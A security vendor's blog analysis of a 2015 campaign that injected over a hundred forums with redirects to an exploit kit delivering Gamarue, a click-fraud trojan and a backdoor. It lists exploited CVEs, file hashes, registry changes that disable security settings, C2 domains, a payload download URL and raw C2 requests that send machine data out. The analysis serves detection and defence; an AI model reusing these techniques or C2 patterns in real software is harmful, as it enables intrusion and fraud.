DIY Chatroom and over a hundred forums injected with malware

Cyphort Labs discovered a malware campaign attacking over a hundred popular forum websites.  They are powered by outdated software so the vulnerability was likely used to compromise them, injecting the malware redirection code. The injection redirects to an exploit kit that downloads encrypted Gamarue malware that is sandbox-aware (does not execute in virtual environments).  As of Apr 8, 2015 the campaign is still ongoing. We analyzed one of the infection chains below, which happens to have minimal detection on Virus Total.

On April 6, 2015 Diychatroom.com was redirecting users to Fiesta Exploit Kit. It delivers a multi-stage binary payload that involves several malware families.  

 The affected websites include:

• www.Diychatroom.com
• www.dogforums.com
• www.e-cigarette-forum.com
• www.excelforum.com
• www.goldenretrieverforum.com
• www.horseforum.com
• www.loverslab.com
• www.ps3news.com
• www.scubaboard.com
• www.visajourney.com
• www.wranglerforum.com
• www.wrestlingforum.com
• and many others, 122 in total!

Many of the domains are owned by VerticalScope, a private company with 120 employees headquartered in Toronto, Canada. It specializes in buying and promoting websites and forums by using a big number of generic domain names they acquired over the past decade. VerticalScope has over 400 websites with combined reach of more than 80 Million unique visitors per month.

 Diychatroom.com Infection

The infection chain is as follows:

This EK is heavily obfuscated but after several layers of deobfuscation, it clearly reveals what it tries to do. It exploits the following vulnerabilities: 

• CVE-2013-2551 (IE)
• CVE-2015-0313 (Flash)

                                                            _{CVE-2013-2551}    

               _{First layer of flash using LoadBytes() to load second layer}

                     _{Second layer flash. CVE-2015-0313}

 Cyphort detects the infection through its chain heuristics engine and browser cooker engine.

Payload

The payload arrives encrypted over the network. This is a multi-stage malware that involves two files  obtained from its resource  and one file downloaded. 

• 77f22bfc9cf7e46c6e738d8b68ad19f6   – Main Dropper
• c091894cd23d49a14d5cabf0d60c379c  – Gamarue
• 2e543c5c9f1df385661d6e527eff2f46 – TrojanClicker.FleerCivet
• 7a6229f6afe767009fe22a119c4165a1 – Backdoor.Ruperk

At the time of discovery, only minimal detection was observed on VirusTotal. Cyphort’s Advanced Threat Detection platform detects all these files.

Main Dropper

The main dropper is armored and will not executed in a virtual environment. 

Armoring:

• anti-virtualbox
• anti-qemu
• anti-vmware

It checks the presence of string VBOX, QEMU and VMWARE from the return of SetupDiGetDeviceRegistryPropertyW.

Under non-virtual system, it drops 2 files obtained from its resource in the %TEMP% folder and execute it via CreateProcess or ShellExecute.

Resource 1

Family: Gamarue

[SHA1:] 039D532C02B7441D9D8C0DBB4D67FDC3AF428DD2

[MD5:] c091894cd23d49a14d5cabf0d60c379c

When executed, it creates a new process of msiexec.exe and injects code into it. It drops a copy of itself in %ALLUSERPROFILE% using random filename, e.g., “mssffnmc.exe”. 

It creates an autostart entry as follows:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run

Value: {random}

Data : %ALLUSERPROFILE%\{copy of itself}

Disables some Windows security settings by changing the value of the following registry entries:

HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System

Value: “EnableLUA“

Data: “0“

 

HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Value: “TaskbarNoNotification“

Data: “1“

Value: “HideSCAHealth“

Data: “1“

 

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced

Value: “Hidden”

Data: “2″

It connects to its CnC server, nindziaboy.net to send data and receive commands. Communication to the server is encrypted and depending on the reply, it can perform the following commands:

• Report 
• Update
• Start

It also performs DNS request to the following domains:

• africa.pool.ntp.org
• oceania.pool.ntp.org
• asia.pool.ntp.org
• south-america.pool.ntp.org
• north-america.pool.ntp.org
• europe.pool.ntp.org

Resource 2

Family: TrojanClicker.FleerCivet

[SHA1:] 79137D2553FD19C2EB287957BB7E5506DF88CD02

[MD5:] 2e543c5c9f1df385661d6e527eff2f46

This malware’s main purpose is to open several hidden IE instance that access websites. 

Similar to the main dropper, it exits and do nothing if it detects it is running under virtual environment.

It drops a copy of itself as Update.exe in the %Windows%\FrameworkUpdate folder, then it creates a service for itself with name as “SystemUpdate”.

It injects to either, iexplore.exe, chrome.exe, firefox,exe, explorer.exe to gain elevated privilege and tries stop the following services:

• SharedAccess
• wscsvc
• MpsSvc
• WinDefend
• wuauserv
• BITS
• ERSvc
• WerSvc

It creates five threads that fire a hidden Internet Explorer Browser that visits the following URLs:

• http://videosearcher{.}org/4ff9ae/9126
• http://truesearchresults{.}com/?aff=7733&saff=9126

 _{Created several hidden IE that visits a url}

Afterwards, the following network connections were observed:

^{GET /analytics.js HTTP/1.1}

^{Accept: */*}

^{Referer: http://truesearchresults.com/casino.php?params=9kwXw9wr5uVwtaXFgiQ%2FkHA8rqoFYQ3%2FQyL57Nj%2BtNc5FDmWNm5NQqv0FE6z7VtZ4vRBqUTKH2i9e0MFc4mgkHksu3IMGGk%2F79BfD4QQKwFiWDvJ2XekFUfGXmdWa%2BihDRQfDOiVNwnSfCX%2FAkh8UtPfNP%2B%2FH0WEbMuVy38gjCQ%3D}

^{User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)}

^{Accept-Encoding: gzip, deflate}

^{Host: www.google-analytics.com}

^{Connection: Keep-Alive}

^{GET /hit?t44.6;r;s1162*589*32;uhttp%3A//truesearchresults.com/casino.php%3Fparams%3D9kwXw9wr5uVwtaXFgiQ%252FkHA8rqoFYQ3%252FQyL57Nj%252BtNc5FDmWNm5NQqv0FE6z7VtZ4vRBqUTKH2i9e0MFc4mgkHksu3IMGGk%252F79BfD4QQKwFiWDvJ2XekFUfGXmdWa%252BihDRQfDOiVNwnSfCX%252FAkh8UtPfNP%252B%252FH0WEbMuVy38gjCQ%253D;0.7172015003936206 HTTP/1.1}

^{Accept: */*}

^{Referer: http://truesearchresults.com/casino.php?params=9kwXw9wr5uVwtaXFgiQ%2FkHA8rqoFYQ3%2FQyL57Nj%2BtNc5FDmWNm5NQqv0FE6z7VtZ4vRBqUTKH2i9e0MFc4mgkHksu3IMGGk%2F79BfD4QQKwFiWDvJ2XekFUfGXmdWa%2BihDRQfDOiVNwnSfCX%2FAkh8UtPfNP%2B%2FH0WEbMuVy38gjCQ%3D}

^{User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)}

^{Accept-Encoding: gzip, deflate}

^{Host: counter.yadro.ru}

^{Connection: Keep-Alive}

Additional details:

Creates mutex with the following name:

•  _HSJ909NJJNJ90203_

Connects to the following urls to get geolocation of the victim’s machine.

• www.telize.com/geoip

 If it detects that it is running on a 64-bit system, it will load its 64-bit counterpart that is found in its resource.

Downloaded Component

Family: Backdoor.Ruperk

[SHA1:] BD16D28FEECC00A744BFED06AB70C918FEE404C3

[MD5:] 7a6229f6afe767009fe22a119c4165a1

This file is downloaded from the following link:

• http://clenodium{.}eu/tmp/file{.}exe

When executed, it drops a copy of itself in %LocalSettings%\ApplicationData\{random}\{random.exe}

It creates a new process of wuauclt.exe and injects into it.  It contacts the following CnC server and wait for commands:

• dobavki-shop.com

Network Connection

GET /getter.php?mode=reg&id=xxxxx80-d14e-49fe-9c0a-1af5058475e7&os=5132&vga=VMware%20SVGA%20II&ocl=0 HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Host: dobavki-shop.com

Connection: Keep-Alive

 

Apparently from the above CnC request, it sends system information in clear text, including:

• MachineGuid
• OS version
• Display device (monitor) name

It waits for the following commands from the server.

• #none – do nothing
• #stop
• #update – update self
• #update_miner
• #opencl
• #destruct – kill self
• #error
• #download  – Download files

The server evaluates the information received from the infected computers and replies back with any one of the above listed commands. When the trojan is executed in a virtual environment (or sandbox) it chooses to stay low and replies with command #none.

 Through our chain heuristics and browser cooker engine, we discovered that several other forum sites are also infected with this same malicious attack.  These forum sites are powered by vBulletin  or by IP Board.

Early this year, Sucuri blog reported a serious vulnerabilty affecting vBSEO that allows an attacker to remotely execute malicious PHP code on your website. vBSEO is a component of vBulletin but it was already discontinued due to several vulnerabilities. The sad fact is that some websites still use it. 

For website administrators affected by this attack, Sucuri posted the following options:

1. Completely remove vBSEO from your site – It is not supported anymore
2. Apply the patch recommended by the vBulletin team
3. Put your site behind a Website Firewall, this will prevent the exploitation of this vulnerability and many others.

 For visitors of forum sites, ensure that you are running the latest version of browsers and flash as this attack involves IE and flash exploits.

Connecting Dots

For the curious threat researchers out there, you may wonder why the armored malware completely avoided all three popular virtualization environments (VirtualBox, Qemu, and Vmware), not even Vmware which is a fairly popular platform adopted by many businesses?  Indeed Cyphort Labs have seen malware samples which singled out VirtualBox and Qemu for evasion, but was happy to play inside Vmware.  In those cases, the objective of armoring design seems to be anti-analysis or anti-sandboxing.  As we have mentioned earlier, this malware campaign has targeted over a hundred forums which seem to be serving mostly individual home users. As we saw from the attack payload (TrojanClicker.FleerCivet) earlier, it is part of a click fraud campaign.  For a click fraud to look legitimate, it better come from home users, so how many home users’ machines would actually run VirtualBox, Qemu, or Vmware?  Very few.  So we believe that this malware pack is designed for click fraud campaign and for distribution using watering hole attacks.  The armoring against all the virtualization environments is done to avoid detection by anti-click-fraud systems.

 Special thanks to Alex Burt, McEnroe Navaraj, Palaniyappan Bala, and the rest of the Cyphort Labs team for their help in the discovery and analysis of this attack.

The post DIY Chatroom and over a hundred forums injected with malware appeared first on Cyphort.